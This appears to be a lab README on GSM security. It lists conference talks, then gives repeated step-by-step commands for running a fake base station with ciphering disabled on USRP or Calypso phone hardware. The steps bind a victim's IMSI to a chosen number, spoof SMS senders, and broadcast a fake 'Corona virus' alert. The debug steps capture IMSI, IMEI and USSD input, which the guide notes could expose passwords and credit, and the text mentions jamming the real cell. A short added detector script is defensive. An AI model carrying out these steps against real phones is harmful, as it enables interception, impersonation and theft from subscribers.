- Software Defined Radio - An Introduction videos
- Software Defined Radio and rtl-sdr - Harald Welte videos
- 25c3: Running your own GSM network videos
- 27c3: Running your own GSM stack on a phone videos
- Running a basic circuit-switched Osmocom GSM network videos
- Making your own 2G GSM cell network in 2023 videos
- 28c3: Defending mobile phones videos
- [PHDays 2012] Sylvain Munaut: Abusing Calypso phones videos
- DeepSec 2010: Targeted DOS Attack and various fun with GSM Um by Sylvain Munaut videos
- GreedyBTS: Hacking Adventures in GSM - Presented By Hacker Fantastic videos
- 27c3: Wideband GSM Sniffing videos
- OpenBTS workshop at 29c3 videos1 videos2 videos3 videos4 videos5
- OsmoDevCon'12: UmTRX transceiver for OpenBTS videos
- Building and Running Community Cellular Networks with OpenBTS videos
- days Security Conference: Harald Welte - OsmocomBB: GSM protocol level security in GSM networks videos1 videos2
- DeepSec 2010 OsmocomBB A tool for GSM protocol level security analysis of GSM networks videos
- Osmocom - Harald Welte . - ehsm - 2012 videos
- osmocombb calypso-bts demos
- Netdev 1.1 - Running Cellular Network Infrastructure on Linux videos
- OsmoDevCall - GSM-R and how it differs from GSM videos
- Harald Welte: Osmocom - Open Source Mobile Communications videos
- Fake base station with open ciphering (A5/0); the network can be GSM (SMS, calls), GPRS or EDGE
- Local attack, but it can be targeted (to find a local victim)
- The victim cannot be reached on the real network (for calls and SMS)
- Detectable with a rooted phone and an application such as IMSI-Catcher Detector or SnoopSnitch, because the network is open (unciphered)
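The indicators named in this list (no ciphering, plus the test PLMN MCC 001 / MNC 01 that the lab network on this page announces) can be checked mechanically on the handset side. The following Python is an added example, not code from this repository or from the detector apps named above; the observation records, field names and severity labels are constructed, and a two-digit MNC is assumed.

```python
# Added example: the observation format and field names are constructed.
LAB_PLMNS = {("001", "01")}  # test PLMN this page's lab network announces


def home_plmn(imsi, mnc_digits=2):
    """Split an IMSI into (MCC, MNC); a 2-digit MNC is assumed."""
    return imsi[:3], imsi[3:3 + mnc_digits]


def assess_cell(obs, imsi):
    """Return (severity, reasons) for one serving-cell observation."""
    plmn = (obs["mcc"], obs["mnc"])
    unciphered = obs["cipher"] == "A5/0"
    lab = plmn in LAB_PLMNS
    foreign = plmn != home_plmn(imsi)  # on its own this is ordinary roaming
    reasons = []
    if unciphered:
        reasons.append("unciphered (A5/0)")
    if lab:
        reasons.append("test PLMN %s-%s" % plmn)
    elif foreign and unciphered:
        reasons.append("foreign PLMN without ciphering")
    if lab or (foreign and unciphered):
        return "alert", reasons
    return ("review" if unciphered else "ok"), reasons


# Constructed observations for a SIM whose IMSI is the page's example value.
IMSI = "646040222463674"
OBSERVATIONS = [
    {"mcc": "646", "mnc": "04", "arfcn": 60, "cipher": "A5/1"},   # home, ciphered
    {"mcc": "646", "mnc": "04", "arfcn": 60, "cipher": "A5/0"},   # home, open
    {"mcc": "208", "mnc": "01", "arfcn": 12, "cipher": "A5/3"},   # roaming, ciphered
    {"mcc": "001", "mnc": "01", "arfcn": 975, "cipher": "A5/0"},  # lab cell
]

if __name__ == "__main__":
    for obs in OBSERVATIONS:
        severity, reasons = assess_cell(obs, IMSI)
        print(obs["mcc"], obs["mnc"], obs["arfcn"], severity, "; ".join(reasons))
```

A real detector would take these fields from baseband diagnostics, which is why the apps above need a rooted phone.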
- USRP
- Motorola phone (aka Calypso phone on Google)
- BladeRF
- LimeSDR
- Install DragonOS 29 or 30
- Create a fake BTS with open ciphering (A5/0)
- Add one user and modify the core network to associate it with the number 0341220590
- Send message from 0341220590 to 0341220590
- Send broadcast message
- Homework: change the number 0341220590 to 0341220591
- Solution 1: using USRP (more stable, and no synchronization with the existing BTS is needed, so if we jam the existing BTS the half-MITM still exists)
wget https://raw.githubusercontent.com/SitrakaResearchAndPOC/nitb-script-all/main/osmo-nitb-scripts.zip
unzip osmo-nitb-scripts.zip
cd osmo-nitb-scripts
The database is at: /var/lib/osmocom/hlr.sqlite3
Install all configs
bash install_services.sh
To avoid the database lock error
fuser -k /var/lib/osmocom/hlr.sqlite3
Open HLR.db
gedit scripts/HLR.py
Change
self.db = sqlite3.connect(hlr_loc)
to
self.db = sqlite3.connect(hlr_loc, timeout=3000)
Modify spoof script 2
gedit scripts_spoof2/sms_send_source_dest_msg.py
Before launching sms_send_source_dest_msg.py, please correct the help text; change:
usage: ./sms_broadcast.py extension message
This script sends a message from the specified extension (number) to all devices connected to this base station
to
usage: ./sms_send_source_dest_msg.py extension_source extension_destination message
This script sends a message from the specified extension source (number) to extension destination connected to this base station
Running the transceiver
osmo-trx-uhd -C /etc/osmocom/osmo-trx-uhd.cfg
Run main_uhd_spoof, which is associated with configs/openbsc_spoof.cfg
ctrl+shift+T
cd osmo-nitb-scripts
python3 main_uhd_spoof.py
ctrl+shift+T
cd osmo-nitb-scripts/scripts_spoof1
Type *#*#4636#*#*
and choose GSM only on your Android phone
Search for GSM networks (on your phone) and select the PLMN with MCC 001 and MNC 01
Type *#001#
to find your phone number (extension with osmo-bts)
bash finding_imsi_extenstion.sh
This shows the IMSI and extension
For example, IMSI 646040222463674 and extension 126
bash set_imsi_extension.sh 646040222463674 0341220590
Verify that the association is correct; for example, IMSI 646040222463674 and extension 0341220590
bash finding_imsi_extenstion.sh
python2 sending_sms_spoof_byextension.py
Send to all extensions in osmo-bts
python2 sending_sms_broadcast.py
The log should be: subscriber extension 0341220590 sms sender extension 0341220590 send ALERT Corona virus
- Solution 1debug: using USRP, run manually in debug mode
wget https://raw.githubusercontent.com/SitrakaResearchAndPOC/nitb-script-all/main/osmo-nitb-scripts.zip
unzip osmo-nitb-scripts.zip
cd osmo-nitb-scripts
bash install_services.sh
To avoid the database lock error
fuser -k /var/lib/osmocom/hlr.sqlite3
Open HLR.db
gedit scripts/HLR.py
Change
self.db = sqlite3.connect(hlr_loc)
to
self.db = sqlite3.connect(hlr_loc, timeout=3000)
Modify spoof script 2
gedit scripts_spoof2/sms_send_source_dest_msg.py
Before launching sms_send_source_dest_msg.py, please correct the help text; change:
usage: ./sms_broadcast.py extension message
This script sends a message from the specified extension (number) to all devices connected to this base station
to
usage: ./sms_send_source_dest_msg.py extension_source extension_destination message
This script sends a message from the specified extension source (number) to extension destination connected to this base station
Running the transceiver
osmo-trx-uhd -C /etc/osmocom/osmo-trx-uhd.cfg
Add the debug mode options: --debug=DRLL:DCC:DMM:DRR:DRSL:DNM
The database is at: /var/lib/osmocom/hlr.sqlite3
/usr/local/bin/osmo-nitb --yes-i-really-want-to-run-prehistoric-software -s -C -c /etc/osmocom2/osmo-nitb.cfg -l /var/lib/osmocom/hlr.sqlite3 --debug=DRLL:DCC:DMM:DRR:DRSL:DNM
Launch the BTS in debug mode, adding the debug mode options: --debug DRSL:DOML:DLAPDM
/usr/local/bin/osmo-bts-trx -s -c /etc/osmocom2/osmo-bts-trx.cfg --debug DRSL:DOML:DLAPDM
Look at the terminal running the command: /usr/local/bin/osmo-nitb --yes-i-really-want-to-run-prehistoric-software -s -C -c /etc/osmocom2/osmo-nitb.cfg -l /var/lib/osmocom/hlr.sqlite3 --debug=DRLL:DCC:DMM:DRR:DRSL:DNM
Type *#*#4636#*#*
and choose GSM only on your Android phone
Search for GSM networks (on your phone) and select the PLMN with MCC 001 and MNC 01
Look at the log, which captures the IMSI and IMEI
Type *#001#
to find your phone number (extension with osmo-bts)
Look at the log for "USSD: Own number requested"
Type USSD *100*123#
Look at the log for USSD: Unhandled USSD (possible to steal password and credits)
ctrl+shift+T
cd osmo-nitb-scripts/scripts_spoof1
bash finding_imsi_extenstion.sh
This shows the IMSI and extension
For example, IMSI 646040222463674 and extension 126
bash set_imsi_extension.sh 646040222463674 0341220590
Verify that the association is correct; for example, IMSI 646040222463674 and extension 0341220590
bash finding_imsi_extenstion.sh
python2 sending_sms_spoof_byextension.py
Send to all extensions in osmo-bts
python2 sending_sms_broadcast.py
The log should be: subscriber extension 0341220590 sms sender extension 0341220590 send ALERT Corona virus
- Solution 2: using one Motorola phone
(Not so stable, and it needs synchronization with the existing BTS by finding the ARFCN to synchronize on, so if we jam the existing BTS the half-MITM no longer exists)
Hardware setup 1: needs a battery and is not programmable with Arduino
serial_cable smartspate sudonull
Hardware setup 2: needs no battery and is programmable with Arduino
Command you need:
dmesg | grep ttyUSB
wget https://raw.githubusercontent.com/SitrakaResearchAndPOC/nitb-script-all/main/osmo-nitb-scripts-calypsobts.zip
unzip osmo-nitb-scripts-calypsobts.zip
cd osmo-nitb-scripts-calypsobts
Type *#*#4636#*#*
and choose GSM only on your Android phone
Install Network Signal Guru on your Android phone
and find the ARFCN that the phone is connected to
Suppose this ARFCN is 975
Set the ARFCN to 975 in services/osmo-trx-lms3.service
gedit services/osmo-trx-lms3.service
Save the configuration
bash install_services.sh
To avoid the database lock error
fuser -k /usr/src/CalypsoBTS/hlr.sqlite3
Open HLR.db
gedit scripts/HLR.py
Change
self.db = sqlite3.connect(hlr_loc)
to
self.db = sqlite3.connect(hlr_loc, timeout=3000)
Modify spoof script 2
gedit scripts_spoof2/sms_send_source_dest_msg.py
Before launching sms_send_source_dest_msg.py, please correct the help text; change:
usage: ./sms_broadcast.py extension message
This script sends a message from the specified extension (number) to all devices connected to this base station
to
usage: ./sms_send_source_dest_msg.py extension_source extension_destination message
This script sends a message from the specified extension source (number) to extension destination connected to this base station
Running transceiver
bash trx.sh
Press the power button of the Motorola phone
Press ctrl+shift+T
cd osmo-nitb-scripts-calypsobts
python3 main_spoof.py
ctrl+shift+T
cd osmo-nitb-scripts-calypsobts/scripts_spoof1
bash finding_imsi_extenstion.sh
This shows the IMSI and extension
For example, IMSI 646040222463674 and extension 126
bash set_imsi_extension.sh 646040222463674 0341220590
Verify that the association is correct; for example, IMSI 646040222463674 and extension 0341220590
bash finding_imsi_extenstion.sh
Type *#*#4636#*#*
and choose GSM only on your Android phone
Search for GSM networks (on your phone) and select the PLMN with MCC 001 and MNC 01
Type *#001#
to find your phone number (extension with osmo-bts)
python2 sending_sms_spoof_byextension.py
Send to all extensions in osmo-bts
python2 sending_sms_broadcast.py
The log should be: subscriber extension 0341220590 sms sender extension 0341220590 send ALERT Corona virus
- Solution 2debug: using one Motorola phone, manual script in debug mode
Command you need:
dmesg | grep ttyUSB
wget https://raw.githubusercontent.com/SitrakaResearchAndPOC/nitb-script-all/main/osmo-nitb-scripts-calypsobts.zip
unzip osmo-nitb-scripts-calypsobts.zip
cd osmo-nitb-scripts-calypsobts
Type *#*#4636#*#*
and choose GSM only on your Android phone
Install Network Signal Guru on your Android phone
and find the ARFCN that the phone is connected to
Suppose this ARFCN is 975
Set the ARFCN to 975 in services/osmo-trx-lms3.service
gedit services/osmo-trx-lms3.service
Save the configuration
bash install_services.sh
To avoid the database lock error
fuser -k /usr/src/CalypsoBTS/hlr.sqlite3
Open HLR.db
gedit scripts/HLR.py
Change
self.db = sqlite3.connect(hlr_loc)
to
self.db = sqlite3.connect(hlr_loc, timeout=3000)
Modify spoof script 2
gedit scripts_spoof2/sms_send_source_dest_msg.py
Before launching sms_send_source_dest_msg.py, please correct the help text; change:
usage: ./sms_broadcast.py extension message
This script sends a message from the specified extension (number) to all devices connected to this base station
to
usage: ./sms_send_source_dest_msg.py extension_source extension_destination message
This script sends a message from the specified extension source (number) to extension destination connected to this base station
Running transceiver
bash trx.sh
Press the power button of the Motorola phone
Press ctrl+shift+T
Launch osmo-nitb in debug mode: --debug=DRLL:DCC:DMM:DRR:DRSL:DNM
The database is at: /usr/src/CalypsoBTS/hlr.sqlite3
osmo-nitb --yes-i-really-want-to-run-prehistoric-software -c /usr/src/CalypsoBTS/openbsc.cfg -l /usr/src/CalypsoBTS/hlr.sqlite3 -P -C --debug=DRLL:DCC:DMM:DRR:DRSL:DNM
Launch osmo-bts with the debug mode option: --debug DRSL:DOML:DLAPDM
osmo-bts-trx -c /usr/src/CalypsoBTS/osmo-bts-trx-calypso.cfg --debug DRSL:DOML:DLAPDM -r 99
Look at the terminal running the command: /usr/local/bin/osmo-nitb --yes-i-really-want-to-run-prehistoric-software -s -C -c /etc/osmocom2/osmo-nitb.cfg -l /var/lib/osmocom/hlr.sqlite3 --debug=DRLL:DCC:DMM:DRR:DRSL:DNM
Type *#*#4636#*#*
and choose GSM only on your Android phone
Search for GSM networks (on your phone) and select the PLMN with MCC 001 and MNC 01
Look at the log, which captures the IMSI and IMEI
Type *#001#
to find your phone number (extension with osmo-bts)
Look at the log for "USSD: Own number requested"
Type USSD *100*123#
Look at the log for USSD: Unhandled USSD (possible to steal password and credits)
ctrl+shift+T
cd osmo-nitb-scripts/scripts_spoof1
bash finding_imsi_extenstion.sh
This shows the IMSI and extension
For example, IMSI 646040222463674 and extension 126
bash set_imsi_extension.sh 646040222463674 0341220590
Verify that the association is correct; for example, IMSI 646040222463674 and extension 0341220590
bash finding_imsi_extenstion.sh
python2 sending_sms_spoof_byextension.py
Send to all extensions in osmo-bts
python2 sending_sms_broadcast.py
The log should be: subscriber extension 0341220590 sms sender extension 0341220590 send ALERT Corona virus
- Remark: don't run the delete_all.sh script after starting the BTS; it is best run before starting a BTS
bash delete_all.sh
The extension 0341220590 should exist as a mobile phone on the GSM network
Using rpizero with automatedscript demos MS-14 cable
- https://osmocom.org/projects/baseband/wiki/CalypsoBTS
- https://github.com/spm81/CalypsoBTS
- https://www.smartspate.com/how-to-create-2g-network-at-your-own-home/
- https://cyberloginit.com/2018/04/27/build-a-gsm-network-with-openbsc-osmobts-osmotrx-and-usrp-b210-on-a-single-pc.html
- https://osmocom.org/issues/4030
- https://www.phdays.com/en/press/news/the-mitm-mobile-contest-gsm-network-down-at-phdays-v/
- https://osmocom.org/projects/baseband/wiki/Phones